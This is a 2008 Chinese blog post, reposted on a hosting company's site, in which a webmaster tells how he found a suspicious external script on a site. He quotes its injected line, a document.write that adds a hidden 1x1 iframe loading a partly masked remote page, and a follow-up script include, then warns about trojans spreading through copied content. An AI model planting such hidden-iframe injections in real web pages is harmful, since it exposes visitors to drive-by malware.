手机站
网通分站
电信主站
密 码:
用户名:
当前位置 : 主页>网站运营>建站经验>列表

黑客挂马,站长钓鱼,网民愿者上钩

来源:互联网 作者:west263.com 时间:2008-02-21
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

题目有点长,大家先凑合着看。文章的关键是内容!

同广大的站长一样,建站时我选择了热门且持久的关键词QQ(这里就不证明他热门了 :-))。再往下细分我选择了免费 QQ。网民被惯坏了,免费东西真是能吸引无限的访问量,不管好坏,不管是真是假。

所以免费 QQ两个长久的高频词汇当然做的人很多(很多重复N遍)。想要得到好的排名当然要及时发布最新的咨询满足访客和爬虫的需要。感觉现在的站长真是被这些爬虫给要挟了,我们做站的要时时讨好那些程序~~

好了上面算是个引子,下面来讲述我的真实经历。

为了满足爬虫,我也不得不想个爬虫一样努力搜寻着包含“免费 QQ”文章,偶尔在一个黑客网站里找到了一个《利用优乐美奶茶漏洞免费刷QQ秀》的动画教程,使用很简单,因为网站没有跟用户数据库相链接所以导致可以无限次领取代码。分析原理不是本文重点,等我去时发现这个漏洞已经被堵上了。

本着追根求源的精神我查看了网站的源码,源码的顶部赫然调用着一个外部的JS,按照常理这样的商业网站连个外部的统计都不会挂的。而且又是在网站的最上面,明眼人一看就知道里面有蹊跷。把JS下载回来,果不其然document.write("<i" "frame style='display:none;' src=http://www.go***.com/my/***.htm width=1 height=1 frameborder=0></i" "frame>"); 代码证明一切。

我用IE打开了上面的网址(我当时一定是疯了,竟然直接打开~~)结果显示找不到该网页,考虑了下绝对又是通过调用JS实现的。于是就下载了下来(正确做法)。

得到代码如下:

<script src="vip.js"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/155**32.js"></script>

真想看看他的51.la统计 到底害了多少人。可惜我没有密码。

……

再发现他其他代码就不在这里多做描述了,因为下面的代码都是加密的而且很长,留着让高手们去研究吧。

文章起这个名字真是玷污了黑客这个神秘的名字,现在到处是买卖流量的广告,一些无良的黑客 一些无良的站长 盲目的网民=

在次事件中那些不知情的站长们这时就成为了黑客的帮凶,站长你采我我采你的习惯更是让木马得到了迅速的传播,可怜的最终用户的资料就这样被别人拿到。

“黑客们”你们赚到了钱却丢失了什么

“站长们”你们有了流量却遗失了什么

“网民们”你们得了免费却付出了什么

?????????????????

Blog上文章 同时发到这里,就是想找点BLOG的友情链接

本人Blog www.ciwoo.cn QQ:859732625 注明来意 谢谢

责任编辑:稻草

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!